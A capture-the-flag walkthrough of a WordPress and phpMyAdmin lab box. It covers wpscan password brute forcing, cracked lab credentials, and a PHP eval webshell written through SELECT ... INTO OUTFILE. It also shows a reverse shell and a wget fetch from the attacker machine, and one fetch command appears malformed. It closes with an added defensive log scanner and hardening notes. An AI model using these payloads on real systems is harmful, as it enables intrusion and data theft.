System IP : 192.168.124.7

### Summary

**1- Overview**

**2- Enumeration**

- 2.1- Nmap Scan
- 2.2- Web Site Discovery
- 2.3- Active Directory Enumeration

**3- Privilege Escalation**

- 3.1- Post-Compromise Enumeration
- 3.2- New Account Enumeration
- 3.3- Post-Compromise Exploitation

## 1- Overview

```text
The target runs WordPress and phpMyAdmin.
Use wpscan to obtain an ordinary user's credentials and log in to the admin backend.
Find a credential password there, gain phpMyAdmin access, and use SELECT ... INTO OUTFILE to write a webshell.
Get a www-data shell, then get a root shell through a scheduled task.
```

## 2- Port Enumeration

### 2.1-Service Enumeration

**The rustscan results are as follows:**

```
rustscan -a 192.168.124.7 -u 5000 -- -A
```

```
80 port open
```

### 2.2-Web Server Enumeration

#### gobuster

```
```

Results:

![[Pasted image 20220331213551.png]]

```
wpscan --enumerate up --url http://lemonsqueezy/wordpress
```

We can find some users:

![[Pasted image 20220331214034.png]]

```
lemon
orange
```

```
wpscan --url http://lemonsqueezy/wordpress -U user.txt -P /usr/share/wordlists/rockyou.txt
```

The login succeeds with orange : ginger

![[Pasted image 20220331214351.png]]

Log in, and we can find this credential:

![[Pasted image 20220331214824.png]]

```
http://lemonsqueezy/phpmyadmin
n0t1n@w0rdl1st!
```

![[Pasted image 20220331220513.png]]

Change it:

```
$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00 ->$P$BY9AWyM0QjsVp5Ed3iBx9VsbqEsiMR0
```

![[Pasted image 20220331220711.png]]

![[Pasted image 20220331220732.png]]

## 3-Establish a foothold

```
select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/html/wordpress/php'
```

![[Pasted image 20220331221614.png]]

![[Pasted image 20220331221744.png]]

Upload a webshell and connect to it with nc; it's a stty shell.

```
http://lemonsqueezy/wordpress/php-reverse-shell.php
```

![[Pasted image 20220331222145.png]]

```
python -c "import pty;pty.spawn('/bin/bash')"
```

## 4- Privilege Escalation

user.txt : TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH

![[Pasted image 20220331222251.png]]

```
wget 192.168.124.8:8080/all.tar > /var/www/html/wordpress
```

![[Pasted image 20220331223837.png]]

![[Pasted image 20220331223903.png]]

![[Pasted image 20220331224358.png]]

### 4.1- Post-Compromise Enumeration

### 4.2- New Account Enumeration

![[Pasted image 20220331224452.png]]

```
user.txt : TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
```
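
Defender's view of the `select ... into outfile` step in section 3, as an added example that is not part of the original writeup: a scanner that flags file-writing queries in a MySQL general query log and rates them by whether the target lies under a web root and whether the selected data carries a script tag. The log lines, the web root list and the MySQL 5.7+ row layout are assumptions made for this example.

```python
import posixpath
import re

# Assumption: document roots to protect; set these to the server's real web roots.
WEB_ROOTS = ("/var/www", "/usr/share/nginx/html")

# SELECT ... INTO OUTFILE|DUMPFILE '<path>'; captures the quoted target path.
FILE_WRITE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(?P<path>.+?)\2", re.I)
# Server-side script opening tags inside the selected data.
SCRIPT_TAG = re.compile(r"<\?(php|=)|<%", re.I)

def classify(query):
    """Return None if the query writes no file, else a finding dict."""
    m = FILE_WRITE.search(query)
    if not m:
        return None
    # Normalise first so '/tmp/../var/www/...' cannot dodge the prefix check.
    target = posixpath.normpath(m.group("path"))
    in_webroot = any(target == r or target.startswith(r + "/") for r in WEB_ROOTS)
    has_script = bool(SCRIPT_TAG.search(query[:m.start()]))
    severity = ("critical" if in_webroot and has_script
                else "high" if in_webroot or has_script else "review")
    return {"path": target, "in_webroot": in_webroot,
            "has_script": has_script, "severity": severity}

def scan_general_log(lines):
    """Return [(line_no, finding)] for Query entries that write a file."""
    hits = []
    for no, line in enumerate(lines, 1):
        # Assumed row layout (MySQL 5.7+): timestamp, thread id, command, argument.
        parts = line.rstrip("\n").split(None, 3)
        if len(parts) == 4 and parts[2] == "Query":
            finding = classify(parts[3])
            if finding:
                hits.append((no, finding))
    return hits

# Constructed sample log; line 3 carries the query from section 3 of this writeup.
SAMPLE_LOG = [
    "2022-03-31T14:15:02.000001Z\t   41 Connect\troot@localhost on  using Socket",
    "2022-03-31T14:15:40.000001Z\t   41 Query\tSELECT user_login FROM wp_users",
    "2022-03-31T14:16:10.000001Z\t   41 Query\tselect '<?php @eval($_POST[pass]);?>' into outfile '/var/www/html/wordpress/php'",
    "2022-03-31T14:17:00.000001Z\t   41 Query\tSELECT * FROM wp_posts INTO OUTFILE '/tmp/../var/www/html/export.csv'",
    "2022-03-31T14:18:00.000001Z\t   52 Query\tSELECT id FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
]

if __name__ == "__main__":
    for no, f in scan_general_log(SAMPLE_LOG):
        print(f"line {no}: {f['severity']:8} {f['path']}")
```

On the server itself, pointing `secure_file_priv` at a directory outside the web root and withholding the `FILE` privilege from application accounts closes this write path.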